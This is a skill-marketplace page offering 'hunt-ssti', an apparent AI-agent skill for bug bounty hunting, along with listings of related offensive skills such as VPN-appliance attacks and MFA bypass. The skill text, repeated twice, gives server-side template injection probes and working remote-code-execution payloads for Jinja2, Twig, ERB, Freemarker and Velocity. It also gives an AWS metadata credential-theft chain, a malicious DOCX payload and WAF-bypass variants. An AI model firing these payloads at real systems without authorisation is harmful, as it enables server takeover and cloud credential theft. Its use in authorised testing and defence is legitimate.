一键在 Manus 中运行任何 Skill

hunt-ssti

星标2,620

分支409

更新时间2026年6月7日 15:15

Hunt server-side template injection (SSTI) across Jinja2 (Flask/Django), Twig (Symfony), Freemarker (Java), ERB (Rails), Spring, Velocity, Mako, Thymeleaf, Smarty. Detection probes use double-curly and dollar-curly math expressions evaluated server-side. Once an engine is fingerprinted, escalate to RCE via the engine-specific class-walker, callback-registrar, or Execute-utility patterns documented in disclosed reports. Detection patterns: error messages reveal engine, blank or numeric eval reveals expression mode. Targets: email templates, PDF/report generators, CMS preview features, error pages with user input. Use when hunting RCE via template rendering, when content shows engine fingerprints, when finding endpoints that compose strings with user input before render.

安装

用 Codex 或 Claude 帮你安装复制这段 Prompt，粘贴到 Codex、Claude 或其他助手里，让它检查 Skill 页面并帮你完成安装。

在 Manus 中运行

来源

elementalsouls

elementalsouls/Claude-BugHunter

打开 GitHub 仓库查看创作者相关仓库

下载

在 Manus 中运行

14. SSTI — SERVER-SIDE TEMPLATE INJECTION

Easy to detect, high payout ($2K–$8K). Direct path to RCE.

Detection Payloads (try all)

{{7*7}}          → 49 = Jinja2 / Twig
${7*7}           → 49 = Freemarker / Velocity / Mako (all use ${...})
<%= 7*7 %>       → 49 = ERB (Ruby)
*{7*7}           → 49 = Spring Thymeleaf
{{7*'7'}}        → 7777777 = Jinja2 (Python string repetition); 49 = Twig (numeric coercion of '7'). Differentiates Jinja2 from Twig.

RCE Payloads

Jinja2 (Python/Flask):

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Twig (PHP/Symfony):

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

ERB (Ruby):

<%= `id` %>

Where to Test

Name/bio/description fields, email templates, invoice name, PDF generators,
URL path parameters, search queries reflected in results, HTTP headers reflected

Related Skills & Chains

hunt-rce — SSTI is the easiest path to RCE on Python/Ruby/PHP/Java stacks because the template language already exposes the runtime. Chain primitive: Jinja2 {{config.__class__.__init__.__globals__['os'].popen('id').read()}} or Freemarker <#assign x="freemarker.template.utility.Execute"?new()>${x("id")} → unauthenticated RCE as the rendering worker. Always escalate fingerprint → class-walker → cmd exec.
hunt-xss — When the template engine sandboxes the runtime (or you only get the rendered output back as HTML), the same {{7*7}} reflection often still yields stored XSS. Chain primitive: sandboxed Jinja2 SSTI without escapes → inject <script> into rendered email template → stored XSS hitting every recipient who views the message.
hunt-ssrf — Template engines often expose URL fetchers/filters before they expose the runtime, giving you SSRF before RCE. Chain primitive: Twig {{ include('http://169.254.169.254/latest/meta-data/iam/security-credentials/') }} or Jinja2 with url_for/custom filters → AWS metadata exfil → cloud creds.
hunt-file-upload — Office docs, SVGs, and email templates uploaded by the user are common SSTI surfaces (the server re-renders them). Chain primitive: upload a DOCX whose word/document.xml contains ${T(java.lang.Runtime).getRuntime().exec("id")} to a Velocity/Freemarker-driven mail-merge → RCE.
security-arsenal — Reach for the engine-specific escape payload tree: Jinja2 class-walker variants (__subclasses__()[N] index hunting), Twig _self.env registerUndefinedFilterCallback, Freemarker ?new() Execute, ERB backticks, Velocity $class.inspect, Smarty {php}...{/php}, plus the WAF-bypass variants ({{request|attr('application')|...}}, Unicode escapes, {%print(...)%}).
triage-validation — Apply the Pre-Severity Gate before claiming Critical RCE. A {{7*7}} → 49 reflection inside a sandboxed engine (e.g., Twig sandbox mode, Jinja2 SandboxedEnvironment with no escape) is Medium SSTI, not Critical RCE. Prove id/OOB DNS callback with a unique marker before writing the report.

同仓库更多 Skills

同仓库

bugcrowd-reporting

elementalsouls/Claude-BugHunter

Bugcrowd-specific reporting tactics complementing report-writing: VRT category search-and-fallback strategy when no exact match exists, manual severity override when VRT defaults underrate impact, severity-request paragraph as first body section, OOS-clause rebuttal templates (rate limiting on auth-flow endpoints, debug-info framing, user-enumeration with sensitive PII, theoretical-issue counter), chained-finding cross-reference patterns, target selection for QA-vs-prod programs, researcher-side hygiene (Bugcrowdninja email alias, account state restoration, friendly-tester posture). Use when filing a Bugcrowd submission, when VRT default seems wrong, when triager closes as OOS or downgrades severity, when chaining linked submissions, or when scope distinguishes production from QA. Pairs with report-writing and triage-validation.

2026-06-072.6k

enterprise-vpn-attack

elementalsouls/Claude-BugHunter

External SSL VPN / remote-access appliance attack matrix — Cisco ASA/AnyConnect, Fortinet FortiGate/FortiOS, Citrix NetScaler/ADC, Palo Alto GlobalProtect, Pulse Secure / Ivanti Connect Secure, SonicWall, F5 Big-IP. Covers version fingerprinting, CVE matrix (2018-2026), AAA backend identification, default credentials, configuration-disclosure paths, pre-auth RCE/SSRF/path-traversal exploits where applicable. Built from authorized-engagement Cisco ASA testing plus 2024-2026 enterprise VPN CVE landscape. Use whenever the target's perimeter exposes any SSL VPN appliance or remote-access gateway — these are the most common initial-access points in 2024-2026 actor TTPs.

2026-06-072.6k

hunt-business-logic

elementalsouls/Claude-BugHunter

Hunting skill for business logic vulnerabilities. Built from 12 public bug bounty reports. Covers coupon-race-stacking (Instacart, Stripe, Reverb), negative-quantity-in-cart price tampering (Upserve, Eternal/Zomato), decimal/fraction price-field overflow (Shipt), client-side checkout amount trust on PayPal redirect (WordPress.org), price-per-unit mass-assignment (Krisp), and archived-price swap / cart-TOCTOU (Stripe). Use when hunting business logic — heavy emphasis on financial-impact-demonstrated cases.

2026-06-072.6k

hunt-cache-poison

elementalsouls/Claude-BugHunter

Hunting skill for cache poison vulnerabilities. Built from 10 public bug bounty reports including X-Forwarded-Host poisoning, X-HTTP-Method-Override / GCS cache, reflected→stored XSS via cache, classic Omer-Gil Web Cache Deception, Cloudflare Cache Deception Armor bypass, session-token cache deception, Akamai hop-by-hop smuggling → server-side edge poisoning, and Kettle's 2024 path-normalization WCD against Cloudflare/Fastly/GCP. Use when hunting cache poisoning, Web Cache Deception, CDN-fronted apps.

2026-06-072.6k

hunt-mfa-bypass

elementalsouls/Claude-BugHunter

Hunt MFA / 2FA bypass — 7 distinct patterns. (1) MFA not enforced on sensitive endpoints (password change, email change accept without MFA challenge), (2) MFA-step skip via direct navigation to post-login URL, (3) MFA-token replay (same code accepted twice), (4) brute-force the 6-digit OTP without rate limit (10^6 attempts at server speed), (5) race condition on OTP validation, (6) recovery-code dump via /api/me, (7) backup factor downgrade (SMS factor with no rate limit). Plus the chain: cookie theft + password oracle + no step-up = ATO without MFA challenge. Detection: trace auth flow in Burp, find every state transition, check if MFA is middleware-gated vs per-endpoint, check OTP entropy and rate limit on OTP-validate. Validate: attacker session reaching post-MFA state. Use when hunting auth bypass, MFA flows, chaining primitives toward ATO.

2026-06-072.6k

hunt-nextjs

elementalsouls/Claude-BugHunter

Hunt Next.js specific vulnerabilities — Server Actions arbitrary function execution, Middleware auth bypass via static asset paths, ISR cache poisoning, Image Optimization SSRF (/_next/image), RSC payload leakage, getServerSideProps injection, source map exposure, debug endpoint leakage. Use when target runs Next.js 13/14/15 or any React SSR framework.

2026-06-072.6k

name

hunt-ssti

description

14. SSTI — SERVER-SIDE TEMPLATE INJECTION

Easy to detect, high payout ($2K–$8K). Direct path to RCE.

Detection Payloads (try all)

{{7*7}}          → 49 = Jinja2 / Twig
${7*7}           → 49 = Freemarker / Velocity / Mako (all use ${...})
<%= 7*7 %>       → 49 = ERB (Ruby)
*{7*7}           → 49 = Spring Thymeleaf
{{7*'7'}}        → 7777777 = Jinja2 (Python string repetition); 49 = Twig (numeric coercion of '7'). Differentiates Jinja2 from Twig.

RCE Payloads

Jinja2 (Python/Flask):

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Twig (PHP/Symfony):

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

ERB (Ruby):

<%= `id` %>

Where to Test

Name/bio/description fields, email templates, invoice name, PDF generators,
URL path parameters, search queries reflected in results, HTTP headers reflected

Related Skills & Chains

hunt-rce — SSTI is the easiest path to RCE on Python/Ruby/PHP/Java stacks because the template language already exposes the runtime. Chain primitive: Jinja2 {{config.__class__.__init__.__globals__['os'].popen('id').read()}} or Freemarker <#assign x="freemarker.template.utility.Execute"?new()>${x("id")} → unauthenticated RCE as the rendering worker. Always escalate fingerprint → class-walker → cmd exec.
hunt-xss — When the template engine sandboxes the runtime (or you only get the rendered output back as HTML), the same {{7*7}} reflection often still yields stored XSS. Chain primitive: sandboxed Jinja2 SSTI without escapes → inject <script> into rendered email template → stored XSS hitting every recipient who views the message.
hunt-ssrf — Template engines often expose URL fetchers/filters before they expose the runtime, giving you SSRF before RCE. Chain primitive: Twig {{ include('http://169.254.169.254/latest/meta-data/iam/security-credentials/') }} or Jinja2 with url_for/custom filters → AWS metadata exfil → cloud creds.
hunt-file-upload — Office docs, SVGs, and email templates uploaded by the user are common SSTI surfaces (the server re-renders them). Chain primitive: upload a DOCX whose word/document.xml contains ${T(java.lang.Runtime).getRuntime().exec("id")} to a Velocity/Freemarker-driven mail-merge → RCE.
security-arsenal — Reach for the engine-specific escape payload tree: Jinja2 class-walker variants (__subclasses__()[N] index hunting), Twig _self.env registerUndefinedFilterCallback, Freemarker ?new() Execute, ERB backticks, Velocity $class.inspect, Smarty {php}...{/php}, plus the WAF-bypass variants ({{request|attr('application')|...}}, Unicode escapes, {%print(...)%}).
triage-validation — Apply the Pre-Severity Gate before claiming Critical RCE. A {{7*7}} → 49 reflection inside a sandboxed engine (e.g., Twig sandbox mode, Jinja2 SandboxedEnvironment with no escape) is Medium SSTI, not Critical RCE. Prove id/OOB DNS callback with a unique marker before writing the report.